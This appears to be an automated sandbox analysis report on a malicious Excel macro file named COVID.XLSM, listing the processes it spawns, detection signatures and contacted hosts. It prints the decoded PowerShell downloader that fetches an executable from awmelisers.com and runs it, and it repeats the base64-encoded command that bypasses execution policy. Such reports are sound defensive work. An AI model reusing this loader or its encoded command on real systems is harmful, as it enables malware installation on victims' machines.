Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded function PS-InstallerV2 { param( [Parameter(Mandatory=$true, Position=0)] [string] $link, [Parameter(Mandatory=$true, Position=1)] [string] $endpoint, [Parameter(Mandatory=$true, Position=2)] [string] $file_dir, [Parameter(Mandatory=$true, Position=3)] [string] $file_name, [Parameter(Mandatory=$true, Position=4)] [string]$extension, [Parameter(Mandatory=$true, Position=5)] [bool] $use_access, [Parameter(Position=6)] [string] $access_string ) $internal_memory = New-Object IO.MemoryStream $req_str = $link + "/" + $endpoint if ($use_access) { $req_str = $req_str + "/" + $access_string } $save_path = $file_dir + "\" + $file_name + "." + $extension $request = [System.Net.WebRequest]::Create("$req_str") $response = $request.GetResponse() $response_stream = $response.GetResponseStream() $response_stream.CopyTo($internal_memory) Set-Content $save_path -Value $internal_memory.ToArray() -Encoding Byte $response_stream.Close() $internal_memory.Close() Start-Process -FilePath $save_path}PS-InstallerV2 "https://awmelisers.com" "api/v3/achyranthes/contrapolarization/kulturkreis" "C:\ProgramData" "Awmelisers Service" "exe" $False Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 471900 Sample: COVID.XLSM Startdate: 26/08/2021 Architecture: WINDOWS Score: 76 19 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->19 21 Very long command line found 2->21 23 Machine Learning detection for sample 2->23 25 3 other signatures 2->25 6 cmd.exe 2->6         started        9 EXCEL.EXE 53 14 2->9         started        process3 file4 27 Very long command line found 6->27 29 Encrypted powershell cmdline option found 6->29 31 Bypasses PowerShell execution policy 6->31 12 powershell.exe 12 7 6->12         started        15 C:\Users\user\Desktop\~$COVID.XLSM, data 9->15 dropped signatures5 process6 dnsIp7 17 awmelisers.com 206.81.23.172, 443, 49165, 49166 DIGITALOCEAN-ASNUS United States 12->17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
206.81.23.172
 awmelisers.com United States
14061 DIGITALOCEAN-ASNUS false

Contacted Domains

Name IP Active
awmelisers.com 206.81.23.172 true